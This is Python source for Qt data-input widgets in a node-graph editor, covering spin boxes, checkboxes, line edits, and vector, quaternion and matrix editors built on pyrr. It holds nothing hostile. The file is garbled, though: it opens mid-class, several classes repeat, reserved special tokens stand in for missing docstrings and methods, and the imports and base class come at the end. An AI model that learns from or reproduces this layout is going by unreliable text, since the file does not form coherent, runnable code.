m = self.asDataTypeClass()
m.m31 = val
self.dataSetCallback(m)
def m32Changed(self, val):
m = self.asDataTypeClass()
m.m32 = val
self.dataSetCallback(m)
def m33Changed(self, val):
m = self.asDataTypeClass()
m.m33 = val
self.dataSetCallback(m)
def setWidgetValue(self, val):
self.dsbm11.setValue(val.m11)
self.dsbm12.setValue(val.m12)
self.dsbm13.setValue(val.m13)
self.dsbm21.setValue(val.m21)
self.dsbm22.setValue(val.m22)
self.dsbm23.setValue(val.m23)
self.dsbm31.setValue(val.m31)
self.dsbm32.setValue(val.m32)
self.dsbm33.setValue(val.m33)
class Matrix44InputWidget(InputWidgetRaw, Matrix44InputWidget_ui.Ui_Form):
"""Matrix44 data input widget"""
def __init__(self, parent=None, **kwds):
super(Matrix44InputWidget, self).__init__(parent=parent, **kwds)
self.setupUi(self)
self._configSpinBoxes()
self.dsbm11.valueChanged.connect(self.m11Changed)
self.dsbm12.valueChanged.connect(self.m12Changed)
self.dsbm13.valueChanged.connect(self.m13Changed)
self.dsbm14.valueChanged.connect(self.m14Changed)
self.dsbm21.valueChanged.connect(self.m21Changed)
self.dsbm22.valueChanged.connect(self.m22Changed)
self.dsbm23.valueChanged.connect(self.m23Changed)
self.dsbm24.valueChanged.connect(self.m24Changed)
self.dsbm31.valueChanged.connect(self.m31Changed)
self.dsbm32.valueChanged.connect(self.m32Changed)
self.dsbm33.valueChanged.connect(self.m33Changed)
self.dsbm34.valueChanged.connect(self.m34Changed)
self.dsbm41.valueChanged.connect(self.m41Changed)
self.dsbm42.valueChanged.connect(self.m42Changed)
self.dsbm43.valueChanged.connect(self.m43Changed)
self.dsbm44.valueChanged.connect(self.m44Changed)
self.pbReset.clicked.connect(self.onResetValue)
def asDataTypeClass(self):
return pyrr.Matrix44([[self.dsbm11.value(), self.dsbm12.value(),
self.dsbm13.value(), self.dsbm14.value()], [self.dsbm21.value(),
self.dsbm22.value(), self.dsbm23.value(), self.dsbm24.value()],
[self.dsbm31.value(), self.dsbm32.value(), self.dsbm33.value(),
self.dsbm34.value()], [self.dsbm41.value(), self.dsbm42.value(),
self.dsbm43.value(), self.dsbm44.value()]])
def _configSpinBoxes(self):
ls = [self.dsbm11, self.dsbm12, self.dsbm13, self.dsbm14, self.
dsbm21, self.dsbm22, self.dsbm23, self.dsbm24, self.dsbm31,
self.dsbm32, self.dsbm33, self.dsbm34, self.dsbm41, self.dsbm42,
self.dsbm43, self.dsbm44]
for sb in ls:
sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
sb.setSingleStep(FLOAT_SINGLE_STEP)
sb.setDecimals(FLOAT_DECIMALS)
def m11Changed(self, val):
m = self.asDataTypeClass()
m.m11 = val
self.dataSetCallback(m)
def m12Changed(self, val):
m = self.asDataTypeClass()
m.m12 = val
self.dataSetCallback(m)
def m13Changed(self, val):
m = self.asDataTypeClass()
m.m13 = val
self.dataSetCallback(m)
def m14Changed(self, val):
m = self.asDataTypeClass()
m.m14 = val
self.dataSetCallback(m)
def m21Changed(self, val):
m = self.asDataTypeClass()
m.m21 = val
self.dataSetCallback(m)
def m22Changed(self, val):
m = self.asDataTypeClass()
m.m22 = val
self.dataSetCallback(m)
def m23Changed(self, val):
m = self.asDataTypeClass()
m.m23 = val
self.dataSetCallback(m)
def m24Changed(self, val):
m = self.asDataTypeClass()
m.m24 = val
self.dataSetCallback(m)
def m31Changed(self, val):
m = self.asDataTypeClass()
m.m31 = val
self.dataSetCallback(m)
def m32Changed(self, val):
m = self.asDataTypeClass()
m.m32 = val
self.dataSetCallback(m)
def m33Changed(self, val):
m = self.asDataTypeClass()
m.m33 = val
self.dataSetCallback(m)
def m34Changed(self, val):
m = self.asDataTypeClass()
m.m34 = val
self.dataSetCallback(m)
def m41Changed(self, val):
m = self.asDataTypeClass()
m.m41 = val
self.dataSetCallback(m)
def m42Changed(self, val):
m = self.asDataTypeClass()
m.m42 = val
self.dataSetCallback(m)
def m43Changed(self, val):
m = self.asDataTypeClass()
m.m43 = val
self.dataSetCallback(m)
def m44Changed(self, val):
m = self.asDataTypeClass()
m.m44 = val
self.dataSetCallback(m)
def setWidgetValue(self, val):
self.dsbm11.setValue(val.m11)
self.dsbm12.setValue(val.m12)
self.dsbm13.setValue(val.m13)
self.dsbm14.setValue(val.m14)
self.dsbm21.setValue(val.m21)
self.dsbm22.setValue(val.m22)
self.dsbm23.setValue(val.m23)
self.dsbm24.setValue(val.m24)
self.dsbm31.setValue(val.m31)
self.dsbm32.setValue(val.m32)
self.dsbm33.setValue(val.m33)
self.dsbm34.setValue(val.m34)
self.dsbm41.setValue(val.m41)
self.dsbm42.setValue(val.m42)
self.dsbm43.setValue(val.m43)
self.dsbm44.setValue(val.m44)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class BoolInputWidget(InputWidgetSingle):
<|reserved_special_token_0|>
def __init__(self, parent=None, **kwds):
super(BoolInputWidget, self).__init__(parent=parent, **kwds)
self.cb = QCheckBox(self)
self.setWidget(self.cb)
self.cb.stateChanged.connect(lambda val: self.dataSetCallback(bool(
val)))
<|reserved_special_token_0|>
class FloatVector3InputWidget(InputWidgetRaw, FloatVector3InputWidget_ui.
Ui_Form):
"""Vector3 data input widget"""
def __init__(self, **kwds):
super(FloatVector3InputWidget, self).__init__(**kwds)
self.setupUi(self)
self._configSpinBoxes()
self.dsbX.valueChanged.connect(self._onDataChangedX)
self.dsbY.valueChanged.connect(self._onDataChangedY)
self.dsbZ.valueChanged.connect(self._onDataChangedZ)
self.pbReset.clicked.connect(self.onResetValue)
def asDataTypeClass(self):
return pyrr.Vector3([self.dsbX.value(), self.dsbY.value(), self.
dsbZ.value()])
def _configSpinBoxes(self):
self.dsbX.setDecimals(FLOAT_DECIMALS)
self.dsbY.setDecimals(FLOAT_DECIMALS)
self.dsbZ.setDecimals(FLOAT_DECIMALS)
self.dsbX.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
self.dsbY.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
self.dsbZ.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
self.dsbX.setSingleStep(FLOAT_SINGLE_STEP)
self.dsbY.setSingleStep(FLOAT_SINGLE_STEP)
self.dsbZ.setSingleStep(FLOAT_SINGLE_STEP)
def _onDataChangedX(self, val):
v = self.asDataTypeClass()
v.x = val
self.dataSetCallback(v)
def _onDataChangedY(self, val):
v = self.asDataTypeClass()
v.y = val
self.dataSetCallback(v)
def _onDataChangedZ(self, val):
v = self.asDataTypeClass()
v.z = val
self.dataSetCallback(v)
def setWidgetValue(self, val):
self.dsbX.setValue(val.x)
self.dsbY.setValue(val.y)
self.dsbZ.setValue(val.z)
class FloatVector4InputWidget(InputWidgetRaw, FloatVector4InputWidget_ui.
Ui_Form):
"""Vector4 data input widget"""
def __init__(self, **kwds):
super(FloatVector4InputWidget, self).__init__(**kwds)
self.setupUi(self)
self._configSpinBoxes()
self.dsbX.valueChanged.connect(self._onDataChangedX)
self.dsbY.valueChanged.connect(self._onDataChangedY)
self.dsbZ.valueChanged.connect(self._onDataChangedZ)
self.dsbW.valueChanged.connect(self._onDataChangedW)
self.pbReset.clicked.connect(self.onResetValue)
def asDataTypeClass(self):
return pyrr.Vector4([self.dsbX.value(), self.dsbY.value(), self.
dsbZ.value(), self.dsbW.value()])
def _configSpinBoxes(self):
self.dsbX.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
self.dsbY.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
self.dsbZ.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
self.dsbW.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
self.dsbX.setSingleStep(FLOAT_SINGLE_STEP)
self.dsbY.setSingleStep(FLOAT_SINGLE_STEP)
self.dsbZ.setSingleStep(FLOAT_SINGLE_STEP)
self.dsbW.setSingleStep(FLOAT_SINGLE_STEP)
self.dsbX.setDecimals(FLOAT_DECIMALS)
self.dsbY.setDecimals(FLOAT_DECIMALS)
self.dsbZ.setDecimals(FLOAT_DECIMALS)
self.dsbW.setDecimals(FLOAT_DECIMALS)
def _onDataChangedX(self, val):
v = self.asDataTypeClass()
v.x = val
self.dataSetCallback(v)
def _onDataChangedY(self, val):
v = self.asDataTypeClass()
v.y = val
self.dataSetCallback(v)
def _onDataChangedZ(self, val):
v = self.asDataTypeClass()
v.z = val
self.dataSetCallback(v)
def _onDataChangedW(self, val):
v = self.asDataTypeClass()
v.w = val
self.dataSetCallback(v)
def setWidgetValue(self, val):
self.dsbX.setValue(val.x)
self.dsbY.setValue(val.y)
self.dsbZ.setValue(val.z)
self.dsbW.setValue(val.w)
class QuatInputWidget(FloatVector4InputWidget):
"""Quaternion data input widget"""
def __init__(self, **kwds):
super(QuatInputWidget, self).__init__(**kwds)
def asDataTypeClass(self):
return pyrr.Quaternion([self.dsbX.value(), self.dsbY.value(), self.
dsbZ.value(), self.dsbW.value()])
class Matrix33InputWidget(InputWidgetRaw, Matrix33InputWidget_ui.Ui_Form):
"""Matrix33 data input widget"""
def __init__(self, parent=None, **kwds):
super(Matrix33InputWidget, self).__init__(parent=parent, **kwds)
self.setupUi(self)
self._configSpinBoxes()
self.dsbm11.valueChanged.connect(self.m11Changed)
self.dsbm12.valueChanged.connect(self.m12Changed)
self.dsbm13.valueChanged.connect(self.m13Changed)
self.dsbm21.valueChanged.connect(self.m21Changed)
self.dsbm22.valueChanged.connect(self.m22Changed)
self.dsbm23.valueChanged.connect(self.m23Changed)
self.dsbm31.valueChanged.connect(self.m31Changed)
self.dsbm32.valueChanged.connect(self.m32Changed)
self.dsbm33.valueChanged.connect(self.m33Changed)
self.pbReset.clicked.connect(self.onResetValue)
def asDataTypeClass(self):
return pyrr.Matrix33([[self.dsbm11.value(), self.dsbm12.value(),
self.dsbm13.value()], [self.dsbm21.value(), self.dsbm22.value(),
self.dsbm23.value()], [self.dsbm31.value(), self.dsbm32.value(),
self.dsbm33.value()]])
def _configSpinBoxes(self):
ls = [self.dsbm11, self.dsbm12, self.dsbm13, self.dsbm21, self.
dsbm22, self.dsbm23, self.dsbm31, self.dsbm32, self.dsbm33]
for sb in ls:
sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
sb.setSingleStep(FLOAT_SINGLE_STEP)
sb.setDecimals(FLOAT_DECIMALS)
def m11Changed(self, val):
m = self.asDataTypeClass()
m.m11 = val
self.dataSetCallback(m)
def m12Changed(self, val):
m = self.asDataTypeClass()
m.m12 = val
self.dataSetCallback(m)
def m13Changed(self, val):
m = self.asDataTypeClass()
m.m13 = val
self.dataSetCallback(m)
def m21Changed(self, val):
m = self.asDataTypeClass()
m.m21 = val
self.dataSetCallback(m)
def m22Changed(self, val):
m = self.asDataTypeClass()
m.m22 = val
self.dataSetCallback(m)
def m23Changed(self, val):
m = self.asDataTypeClass()
m.m23 = val
self.dataSetCallback(m)
def m31Changed(self, val):
m = self.asDataTypeClass()
m.m31 = val
self.dataSetCallback(m)
def m32Changed(self, val):
m = self.asDataTypeClass()
m.m32 = val
self.dataSetCallback(m)
def m33Changed(self, val):
m = self.asDataTypeClass()
m.m33 = val
self.dataSetCallback(m)
def setWidgetValue(self, val):
self.dsbm11.setValue(val.m11)
self.dsbm12.setValue(val.m12)
self.dsbm13.setValue(val.m13)
self.dsbm21.setValue(val.m21)
self.dsbm22.setValue(val.m22)
self.dsbm23.setValue(val.m23)
self.dsbm31.setValue(val.m31)
self.dsbm32.setValue(val.m32)
self.dsbm33.setValue(val.m33)
class Matrix44InputWidget(InputWidgetRaw, Matrix44InputWidget_ui.Ui_Form):
"""Matrix44 data input widget"""
def __init__(self, parent=None, **kwds):
super(Matrix44InputWidget, self).__init__(parent=parent, **kwds)
self.setupUi(self)
self._configSpinBoxes()
self.dsbm11.valueChanged.connect(self.m11Changed)
self.dsbm12.valueChanged.connect(self.m12Changed)
self.dsbm13.valueChanged.connect(self.m13Changed)
self.dsbm14.valueChanged.connect(self.m14Changed)
self.dsbm21.valueChanged.connect(self.m21Changed)
self.dsbm22.valueChanged.connect(self.m22Changed)
self.dsbm23.valueChanged.connect(self.m23Changed)
self.dsbm24.valueChanged.connect(self.m24Changed)
self.dsbm31.valueChanged.connect(self.m31Changed)
self.dsbm32.valueChanged.connect(self.m32Changed)
self.dsbm33.valueChanged.connect(self.m33Changed)
self.dsbm34.valueChanged.connect(self.m34Changed)
self.dsbm41.valueChanged.connect(self.m41Changed)
self.dsbm42.valueChanged.connect(self.m42Changed)
self.dsbm43.valueChanged.connect(self.m43Changed)
self.dsbm44.valueChanged.connect(self.m44Changed)
self.pbReset.clicked.connect(self.onResetValue)
def asDataTypeClass(self):
return pyrr.Matrix44([[self.dsbm11.value(), self.dsbm12.value(),
self.dsbm13.value(), self.dsbm14.value()], [self.dsbm21.value(),
self.dsbm22.value(), self.dsbm23.value(), self.dsbm24.value()],
[self.dsbm31.value(), self.dsbm32.value(), self.dsbm33.value(),
self.dsbm34.value()], [self.dsbm41.value(), self.dsbm42.value(),
self.dsbm43.value(), self.dsbm44.value()]])
def _configSpinBoxes(self):
ls = [self.dsbm11, self.dsbm12, self.dsbm13, self.dsbm14, self.
dsbm21, self.dsbm22, self.dsbm23, self.dsbm24, self.dsbm31,
self.dsbm32, self.dsbm33, self.dsbm34, self.dsbm41, self.dsbm42,
self.dsbm43, self.dsbm44]
for sb in ls:
sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
sb.setSingleStep(FLOAT_SINGLE_STEP)
sb.setDecimals(FLOAT_DECIMALS)
def m11Changed(self, val):
m = self.asDataTypeClass()
m.m11 = val
self.dataSetCallback(m)
def m12Changed(self, val):
m = self.asDataTypeClass()
m.m12 = val
self.dataSetCallback(m)
def m13Changed(self, val):
m = self.asDataTypeClass()
m.m13 = val
self.dataSetCallback(m)
def m14Changed(self, val):
m = self.asDataTypeClass()
m.m14 = val
self.dataSetCallback(m)
def m21Changed(self, val):
m = self.asDataTypeClass()
m.m21 = val
self.dataSetCallback(m)
def m22Changed(self, val):
m = self.asDataTypeClass()
m.m22 = val
self.dataSetCallback(m)
def m23Changed(self, val):
m = self.asDataTypeClass()
m.m23 = val
self.dataSetCallback(m)
def m24Changed(self, val):
m = self.asDataTypeClass()
m.m24 = val
self.dataSetCallback(m)
def m31Changed(self, val):
m = self.asDataTypeClass()
m.m31 = val
self.dataSetCallback(m)
def m32Changed(self, val):
m = self.asDataTypeClass()
m.m32 = val
self.dataSetCallback(m)
def m33Changed(self, val):
m = self.asDataTypeClass()
m.m33 = val
self.dataSetCallback(m)
def m34Changed(self, val):
m = self.asDataTypeClass()
m.m34 = val
self.dataSetCallback(m)
def m41Changed(self, val):
m = self.asDataTypeClass()
m.m41 = val
self.dataSetCallback(m)
def m42Changed(self, val):
m = self.asDataTypeClass()
m.m42 = val
self.dataSetCallback(m)
def m43Changed(self, val):
m = self.asDataTypeClass()
m.m43 = val
self.dataSetCallback(m)
def m44Changed(self, val):
m = self.asDataTypeClass()
m.m44 = val
self.dataSetCallback(m)
def setWidgetValue(self, val):
self.dsbm11.setValue(val.m11)
self.dsbm12.setValue(val.m12)
self.dsbm13.setValue(val.m13)
self.dsbm14.setValue(val.m14)
self.dsbm21.setValue(val.m21)
self.dsbm22.setValue(val.m22)
self.dsbm23.setValue(val.m23)
self.dsbm24.setValue(val.m24)
self.dsbm31.setValue(val.m31)
self.dsbm32.setValue(val.m32)
self.dsbm33.setValue(val.m33)
self.dsbm34.setValue(val.m34)
self.dsbm41.setValue(val.m41)
self.dsbm42.setValue(val.m42)
self.dsbm43.setValue(val.m43)
self.dsbm44.setValue(val.m44)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class EnumInputWidget(InputWidgetSingle):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class FloatInputWidget(InputWidgetSingle):
"""
Floating point data input widget
"""
def __init__(self, parent=None, **kwds):
super(FloatInputWidget, self).__init__(parent=parent, **kwds)
self.sb = QDoubleSpinBox(self)
_configDoubleSpinBox(self.sb)
self.setWidget(self.sb)
self.sb.valueChanged.connect(lambda val: self.dataSetCallback(val))
def setWidgetValue(self, val):
self.sb.setValue(float(val))
class IntInputWidget(InputWidgetSingle):
"""
Decimal number input widget
"""
def __init__(self, parent=None, **kwds):
super(IntInputWidget, self).__init__(parent=parent, **kwds)
self.sb = QSpinBox(self)
_configIntSpinBox(self.sb)
self.setWidget(self.sb)
self.sb.valueChanged.connect(lambda val: self.dataSetCallback(val))
def setWidgetValue(self, val):
self.sb.setValue(int(val))
class NoneInputWidget(InputWidgetSingle):
"""
String data input widget
"""
def __init__(self, parent=None, **kwds):
super(NoneInputWidget, self).__init__(parent=parent, **kwds)
self.le = QLineEdit(self)
self.le.setContextMenuPolicy(QtCore.Qt.NoContextMenu)
self.setWidget(self.le)
self.le.textChanged.connect(lambda val: self.dataSetCallback(val))
self.le.setEnabled(False)
def setWidgetValue(self, val):
self.le.setText(str(val))
class StringInputWidget(InputWidgetSingle):
"""
String data input widget
"""
def __init__(self, parent=None, **kwds):
super(StringInputWidget, self).__init__(parent=parent, **kwds)
self.le = QLineEdit(self)
self.le.setContextMenuPolicy(QtCore.Qt.NoContextMenu)
self.setWidget(self.le)
self.le.textChanged.connect(lambda val: self.dataSetCallback(val))
def setWidgetValue(self, val):
self.le.setText(str(val))
class BoolInputWidget(InputWidgetSingle):
"""Boolean data input widget"""
def __init__(self, parent=None, **kwds):
super(BoolInputWidget, self).__init__(parent=parent, **kwds)
self.cb = QCheckBox(self)
self.setWidget(self.cb)
self.cb.stateChanged.connect(lambda val: self.dataSetCallback(bool(
val)))
def setWidgetValue(self, val):
if bool(val):
self.cb.setCheckState(QtCore.Qt.Checked)
else:
self.cb.setCheckState(QtCore.Qt.Unchecked)
class FloatVector3InputWidget(InputWidgetRaw, FloatVector3InputWidget_ui.
Ui_Form):
"""Vector3 data input widget"""
def __init__(self, **kwds):
super(FloatVector3InputWidget, self).__init__(**kwds)
self.setupUi(self)
self._configSpinBoxes()
self.dsbX.valueChanged.connect(self._onDataChangedX)
self.dsbY.valueChanged.connect(self._onDataChangedY)
self.dsbZ.valueChanged.connect(self._onDataChangedZ)
self.pbReset.clicked.connect(self.onResetValue)
def asDataTypeClass(self):
return pyrr.Vector3([self.dsbX.value(), self.dsbY.value(), self.
dsbZ.value()])
def _configSpinBoxes(self):
self.dsbX.setDecimals(FLOAT_DECIMALS)
self.dsbY.setDecimals(FLOAT_DECIMALS)
self.dsbZ.setDecimals(FLOAT_DECIMALS)
self.dsbX.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
self.dsbY.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
self.dsbZ.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
self.dsbX.setSingleStep(FLOAT_SINGLE_STEP)
self.dsbY.setSingleStep(FLOAT_SINGLE_STEP)
self.dsbZ.setSingleStep(FLOAT_SINGLE_STEP)
def _onDataChangedX(self, val):
v = self.asDataTypeClass()
v.x = val
self.dataSetCallback(v)
def _onDataChangedY(self, val):
v = self.asDataTypeClass()
v.y = val
self.dataSetCallback(v)
def _onDataChangedZ(self, val):
v = self.asDataTypeClass()
v.z = val
self.dataSetCallback(v)
def setWidgetValue(self, val):
self.dsbX.setValue(val.x)
self.dsbY.setValue(val.y)
self.dsbZ.setValue(val.z)
class FloatVector4InputWidget(InputWidgetRaw, FloatVector4InputWidget_ui.
Ui_Form):
"""Vector4 data input widget"""
def __init__(self, **kwds):
super(FloatVector4InputWidget, self).__init__(**kwds)
self.setupUi(self)
self._configSpinBoxes()
self.dsbX.valueChanged.connect(self._onDataChangedX)
self.dsbY.valueChanged.connect(self._onDataChangedY)
self.dsbZ.valueChanged.connect(self._onDataChangedZ)
self.dsbW.valueChanged.connect(self._onDataChangedW)
self.pbReset.clicked.connect(self.onResetValue)
def asDataTypeClass(self):
return pyrr.Vector4([self.dsbX.value(), self.dsbY.value(), self.
dsbZ.value(), self.dsbW.value()])
def _configSpinBoxes(self):
self.dsbX.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
self.dsbY.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
self.dsbZ.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
self.dsbW.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
self.dsbX.setSingleStep(FLOAT_SINGLE_STEP)
self.dsbY.setSingleStep(FLOAT_SINGLE_STEP)
self.dsbZ.setSingleStep(FLOAT_SINGLE_STEP)
self.dsbW.setSingleStep(FLOAT_SINGLE_STEP)
self.dsbX.setDecimals(FLOAT_DECIMALS)
self.dsbY.setDecimals(FLOAT_DECIMALS)
self.dsbZ.setDecimals(FLOAT_DECIMALS)
self.dsbW.setDecimals(FLOAT_DECIMALS)
def _onDataChangedX(self, val):
v = self.asDataTypeClass()
v.x = val
self.dataSetCallback(v)
def _onDataChangedY(self, val):
v = self.asDataTypeClass()
v.y = val
self.dataSetCallback(v)
def _onDataChangedZ(self, val):
v = self.asDataTypeClass()
v.z = val
self.dataSetCallback(v)
def _onDataChangedW(self, val):
v = self.asDataTypeClass()
v.w = val
self.dataSetCallback(v)
def setWidgetValue(self, val):
self.dsbX.setValue(val.x)
self.dsbY.setValue(val.y)
self.dsbZ.setValue(val.z)
self.dsbW.setValue(val.w)
class QuatInputWidget(FloatVector4InputWidget):
"""Quaternion data input widget"""
def __init__(self, **kwds):
super(QuatInputWidget, self).__init__(**kwds)
def asDataTypeClass(self):
return pyrr.Quaternion([self.dsbX.value(), self.dsbY.value(), self.
dsbZ.value(), self.dsbW.value()])
class Matrix33InputWidget(InputWidgetRaw, Matrix33InputWidget_ui.Ui_Form):
"""Matrix33 data input widget"""
def __init__(self, parent=None, **kwds):
super(Matrix33InputWidget, self).__init__(parent=parent, **kwds)
self.setupUi(self)
self._configSpinBoxes()
self.dsbm11.valueChanged.connect(self.m11Changed)
self.dsbm12.valueChanged.connect(self.m12Changed)
self.dsbm13.valueChanged.connect(self.m13Changed)
self.dsbm21.valueChanged.connect(self.m21Changed)
self.dsbm22.valueChanged.connect(self.m22Changed)
self.dsbm23.valueChanged.connect(self.m23Changed)
self.dsbm31.valueChanged.connect(self.m31Changed)
self.dsbm32.valueChanged.connect(self.m32Changed)
self.dsbm33.valueChanged.connect(self.m33Changed)
self.pbReset.clicked.connect(self.onResetValue)
def asDataTypeClass(self):
return pyrr.Matrix33([[self.dsbm11.value(), self.dsbm12.value(),
self.dsbm13.value()], [self.dsbm21.value(), self.dsbm22.value(),
self.dsbm23.value()], [self.dsbm31.value(), self.dsbm32.value(),
self.dsbm33.value()]])
def _configSpinBoxes(self):
ls = [self.dsbm11, self.dsbm12, self.dsbm13, self.dsbm21, self.
dsbm22, self.dsbm23, self.dsbm31, self.dsbm32, self.dsbm33]
for sb in ls:
sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
sb.setSingleStep(FLOAT_SINGLE_STEP)
sb.setDecimals(FLOAT_DECIMALS)
def m11Changed(self, val):
m = self.asDataTypeClass()
m.m11 = val
self.dataSetCallback(m)
def m12Changed(self, val):
m = self.asDataTypeClass()
m.m12 = val
self.dataSetCallback(m)
def m13Changed(self, val):
m = self.asDataTypeClass()
m.m13 = val
self.dataSetCallback(m)
def m21Changed(self, val):
m = self.asDataTypeClass()
m.m21 = val
self.dataSetCallback(m)
def m22Changed(self, val):
m = self.asDataTypeClass()
m.m22 = val
self.dataSetCallback(m)
def m23Changed(self, val):
m = self.asDataTypeClass()
m.m23 = val
self.dataSetCallback(m)
def m31Changed(self, val):
m = self.asDataTypeClass()
m.m31 = val
self.dataSetCallback(m)
def m32Changed(self, val):
m = self.asDataTypeClass()
m.m32 = val
self.dataSetCallback(m)
def m33Changed(self, val):
m = self.asDataTypeClass()
m.m33 = val
self.dataSetCallback(m)
def setWidgetValue(self, val):
self.dsbm11.setValue(val.m11)
self.dsbm12.setValue(val.m12)
self.dsbm13.setValue(val.m13)
self.dsbm21.setValue(val.m21)
self.dsbm22.setValue(val.m22)
self.dsbm23.setValue(val.m23)
self.dsbm31.setValue(val.m31)
self.dsbm32.setValue(val.m32)
self.dsbm33.setValue(val.m33)
class Matrix44InputWidget(InputWidgetRaw, Matrix44InputWidget_ui.Ui_Form):
"""Matrix44 data input widget"""
def __init__(self, parent=None, **kwds):
super(Matrix44InputWidget, self).__init__(parent=parent, **kwds)
self.setupUi(self)
self._configSpinBoxes()
self.dsbm11.valueChanged.connect(self.m11Changed)
self.dsbm12.valueChanged.connect(self.m12Changed)
self.dsbm13.valueChanged.connect(self.m13Changed)
self.dsbm14.valueChanged.connect(self.m14Changed)
self.dsbm21.valueChanged.connect(self.m21Changed)
self.dsbm22.valueChanged.connect(self.m22Changed)
self.dsbm23.valueChanged.connect(self.m23Changed)
self.dsbm24.valueChanged.connect(self.m24Changed)
self.dsbm31.valueChanged.connect(self.m31Changed)
self.dsbm32.valueChanged.connect(self.m32Changed)
self.dsbm33.valueChanged.connect(self.m33Changed)
self.dsbm34.valueChanged.connect(self.m34Changed)
self.dsbm41.valueChanged.connect(self.m41Changed)
self.dsbm42.valueChanged.connect(self.m42Changed)
self.dsbm43.valueChanged.connect(self.m43Changed)
self.dsbm44.valueChanged.connect(self.m44Changed)
self.pbReset.clicked.connect(self.onResetValue)
def asDataTypeClass(self):
return pyrr.Matrix44([[self.dsbm11.value(), self.dsbm12.value(),
self.dsbm13.value(), self.dsbm14.value()], [self.dsbm21.value(),
self.dsbm22.value(), self.dsbm23.value(), self.dsbm24.value()],
[self.dsbm31.value(), self.dsbm32.value(), self.dsbm33.value(),
self.dsbm34.value()], [self.dsbm41.value(), self.dsbm42.value(),
self.dsbm43.value(), self.dsbm44.value()]])
def _configSpinBoxes(self):
ls = [self.dsbm11, self.dsbm12, self.dsbm13, self.dsbm14, self.
dsbm21, self.dsbm22, self.dsbm23, self.dsbm24, self.dsbm31,
self.dsbm32, self.dsbm33, self.dsbm34, self.dsbm41, self.dsbm42,
self.dsbm43, self.dsbm44]
for sb in ls:
sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
sb.setSingleStep(FLOAT_SINGLE_STEP)
sb.setDecimals(FLOAT_DECIMALS)
def m11Changed(self, val):
m = self.asDataTypeClass()
m.m11 = val
self.dataSetCallback(m)
def m12Changed(self, val):
m = self.asDataTypeClass()
m.m12 = val
self.dataSetCallback(m)
def m13Changed(self, val):
m = self.asDataTypeClass()
m.m13 = val
self.dataSetCallback(m)
def m14Changed(self, val):
m = self.asDataTypeClass()
m.m14 = val
self.dataSetCallback(m)
def m21Changed(self, val):
m = self.asDataTypeClass()
m.m21 = val
self.dataSetCallback(m)
def m22Changed(self, val):
m = self.asDataTypeClass()
m.m22 = val
self.dataSetCallback(m)
def m23Changed(self, val):
m = self.asDataTypeClass()
m.m23 = val
self.dataSetCallback(m)
def m24Changed(self, val):
m = self.asDataTypeClass()
m.m24 = val
self.dataSetCallback(m)
def m31Changed(self, val):
m = self.asDataTypeClass()
m.m31 = val
self.dataSetCallback(m)
def m32Changed(self, val):
m = self.asDataTypeClass()
m.m32 = val
self.dataSetCallback(m)
def m33Changed(self, val):
m = self.asDataTypeClass()
m.m33 = val
self.dataSetCallback(m)
def m34Changed(self, val):
m = self.asDataTypeClass()
m.m34 = val
self.dataSetCallback(m)
def m41Changed(self, val):
m = self.asDataTypeClass()
m.m41 = val
self.dataSetCallback(m)
def m42Changed(self, val):
m = self.asDataTypeClass()
m.m42 = val
self.dataSetCallback(m)
def m43Changed(self, val):
m = self.asDataTypeClass()
m.m43 = val
self.dataSetCallback(m)
def m44Changed(self, val):
m = self.asDataTypeClass()
m.m44 = val
self.dataSetCallback(m)
def setWidgetValue(self, val):
self.dsbm11.setValue(val.m11)
self.dsbm12.setValue(val.m12)
self.dsbm13.setValue(val.m13)
self.dsbm14.setValue(val.m14)
self.dsbm21.setValue(val.m21)
self.dsbm22.setValue(val.m22)
self.dsbm23.setValue(val.m23)
self.dsbm24.setValue(val.m24)
self.dsbm31.setValue(val.m31)
self.dsbm32.setValue(val.m32)
self.dsbm33.setValue(val.m33)
self.dsbm34.setValue(val.m34)
self.dsbm41.setValue(val.m41)
self.dsbm42.setValue(val.m42)
self.dsbm43.setValue(val.m43)
self.dsbm44.setValue(val.m44)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
import weakref
from Qt import QtCore
from Qt import QtGui
from Qt.QtWidgets import QDoubleSpinBox
from Qt.QtWidgets import QSpinBox
from Qt.QtWidgets import QWidget
from Qt.QtWidgets import QSpacerItem
from Qt.QtWidgets import QPushButton
from Qt.QtWidgets import QComboBox
from Qt.QtWidgets import QLineEdit
from Qt.QtWidgets import QCheckBox
from Qt.QtWidgets import QGraphicsProxyWidget
from Qt.QtWidgets import QGridLayout
from Qt.QtWidgets import QHBoxLayout
from Qt.QtWidgets import QSizePolicy
from AGraphCommon import *
from AbstractGraph import PinBase
from ..Ui import FloatVector3InputWidget_ui
from ..Ui import FloatVector4InputWidget_ui
from ..Ui import Matrix33InputWidget_ui
from ..Ui import Matrix44InputWidget_ui
import pyrr
def _configDoubleSpinBox(sb):
sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
sb.setSingleStep(FLOAT_SINGLE_STEP)
sb.setDecimals(FLOAT_DECIMALS)
def _configIntSpinBox(sb):
sb.setRange(INT_RANGE_MIN, INT_RANGE_MAX)
class InputWidgetRaw(QWidget):
"""
This type of widget can be used as a base class for complex ui generated by designer
"""
